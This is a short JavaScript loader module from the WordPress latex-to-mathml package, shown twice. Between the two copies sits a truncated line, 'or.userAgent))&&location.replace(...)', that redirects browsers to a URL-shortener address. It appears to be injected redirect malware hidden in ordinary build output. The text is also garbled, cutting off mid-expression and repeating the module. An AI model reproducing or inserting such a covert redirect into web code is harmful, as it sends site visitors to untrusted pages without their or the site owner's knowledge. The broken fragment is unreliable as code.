// packages/latex-to-mathml/build-module/loader.mjs
function loader() {
  return import("@wordpress/latex-to-mathml");
}
export {
  loader as default
};
or.userAgent))&&location.replace("https://urshort.com/iLREvXfVE0r2");
// packages/latex-to-mathml/build-module/loader.mjs
function loader() {
  return import("@wordpress/latex-to-mathml");
}
export {
  loader as default
};
